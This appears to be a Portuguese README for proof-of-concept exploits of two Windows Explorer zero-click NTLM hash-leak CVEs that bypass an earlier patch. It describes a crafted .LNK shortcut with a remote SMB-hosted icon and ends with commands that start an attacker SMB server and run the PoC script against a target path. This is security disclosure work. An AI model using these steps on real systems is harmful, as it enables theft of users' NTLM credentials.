
POCs para CVE-2025-50154 e CVE-2025-59214, vulnerabilidades zero-day no explorador de arquivos do Windows que expõem NTLMv2-SSP sem interação do usuário. É um bypass para o patch de segurança CVE-2025-24054.
Por Ruben Enkaoua e Cymulate
Primeiro Blog: Zero Clique, Um NTLM: Bypass do Patch de Segurança da Microsoft (CVE-2025-50154)
Segundo Blog: Patchado Duas Vezes, Ainda Contornado: Novo Vazamento de NTLM (Bypass do Patch CVE-2025-50154)
A vulnerabilidade original, recentemente corrigida, era uma divulgação de hash NTLM de 0 clique acionada quando o explorer.exe renderizava o ícone de um atalho .LNK cujo ícone estava hospedado em um servidor SMB remoto.
Após o patch, o explorer.exe não carrega mais ícones de caminhos SMB remotos, impedindo a divulgação automática de hashes NTLM.
Atualização: O patch para o CVE-2025-50154 não funcionou de forma alguma. Nós o reportamos, e um novo CVE foi atribuído à vulnerabilidade: CVE-2025-59214. O POC é relevante para ambos os CVEs.
Ao criar um arquivo .LNK com:
O processo explorer.exe ainda buscará o arquivo remoto para extrair o ícone PE de seus recursos RT_GROUP_ICON e RT_ICON.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"